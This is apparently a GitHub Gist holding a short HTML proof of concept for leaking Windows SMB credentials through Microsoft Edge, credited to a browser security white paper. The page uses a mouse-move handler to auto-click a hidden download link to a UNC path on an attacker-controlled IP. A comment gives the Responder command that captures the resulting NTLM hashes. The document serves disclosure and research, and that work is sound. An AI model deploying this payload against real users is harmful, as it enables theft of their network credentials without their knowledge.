Last active
August 20, 2018 20:08
-
-
Save mgeeky/44ce8a8887c169aa6a0093d915ea103d to your computer and use it in GitHub Desktop.
SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- PoC for leaking SMB Credentials with listening Responder --> | |
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. --> | |
<!-- To be used as: $ `responder -I eth0 -w -r f -v` --> | |
<body onmousemove="document.getElementById(6).click()"> | |
<a id=6 href="\\192.168.56.101\edgeleak" download></a> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment